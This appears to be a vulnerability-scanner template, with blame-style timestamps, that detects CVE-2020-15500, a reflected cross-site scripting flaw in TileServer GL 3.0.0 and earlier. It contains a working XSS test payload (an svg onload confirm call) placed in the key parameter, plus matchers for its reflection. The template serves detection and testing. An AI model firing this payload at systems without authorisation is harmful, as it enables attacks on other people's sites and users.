2021-04-11 10:42:21 +00:00
id : CVE-2020-15500
info :
2022-08-16 14:14:41 +00:00
name : TileServer GL <=3.0.0 - Cross-Site Scripting
2021-04-11 10:42:21 +00:00
author : Akash.C
severity : medium
2022-08-16 14:14:41 +00:00
description : TileServer GL through 3.0.0 is vulnerable to reflected cross-site scripting via server.js because the content of the key GET parameter is reflected unsanitized in an HTTP response for the application's main page.
2021-08-19 13:17:27 +00:00
reference :
- https://github.com/maptiler/tileserver-gl/issues/461
2022-05-17 09:18:12 +00:00
- http://packetstormsecurity.com/files/162193/Tileserver-gl-3.0.0-Cross-Site-Scripting.html
2022-08-16 14:14:41 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2020-15500
2021-09-10 11:26:40 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
2022-04-22 10:38:41 +00:00
cvss-score : 6.1
2021-09-10 11:26:40 +00:00
cve-id : CVE-2020-15500
cwe-id : CWE-79
2022-08-27 04:41:18 +00:00
tags : cve,cve2020,xss,tileserver,packetstorm
2021-04-11 10:42:21 +00:00
requests :
- method : GET
path :
2021-05-11 19:02:16 +00:00
- '{{BaseURL}}/?key=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss%27%29%3E'
2021-04-11 10:42:21 +00:00
matchers-condition : and
matchers :
- type : status
status :
- 200
- type : word
part : header
words :
- "text/html"
- type : word
words :
2021-05-11 19:02:16 +00:00
- "'>\"<svg/onload=confirm('xss')>"
2022-08-16 14:14:41 +00:00
part : body
# Enhanced by mp on 2022/08/15